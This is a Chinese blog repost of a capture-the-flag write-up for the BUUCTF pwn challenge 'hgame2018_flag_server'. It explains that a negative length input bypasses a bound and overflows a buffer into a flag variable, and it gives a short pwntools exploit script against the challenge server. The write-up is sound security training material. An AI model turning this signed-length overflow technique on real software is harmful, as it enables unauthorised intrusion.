[BUUCTF-pwn]——hgame2018_flag_server
生活随笔
收集整理的這篇文章主要介紹了
[BUUCTF-pwn]——hgame2018_flag_server
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
[BUUCTF-pwn]——hgame2018_flag_server
保護開啟了 NX和canary
看下反匯編,只要v10非0就可以得到flag, 也就是v6 = v8,但是顯然v8是一個隨機數, 并且沒有找到可以修改的地方。
仔細觀察上面的代碼,一旦v5為負數,我們就可以無限輸入了,并且s1距離v10為0x40 = 64, 我們只需要輸入0x40個字符就可以開始修改v10了
exploit
from pwn import * p = remote("node3.buuoj.cn",28128) p.sendlineafter('your username length: ','-1') payload= 'a' * 0x40 + p32(1) p.sendlineafter('whats your username?\n',payload) p.interactive()總結
以上是生活随笔為你收集整理的[BUUCTF-pwn]——hgame2018_flag_server的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: [BUUCTF-pwn]——ciscn_
- 下一篇: [BUUCTF-pwn]——picoct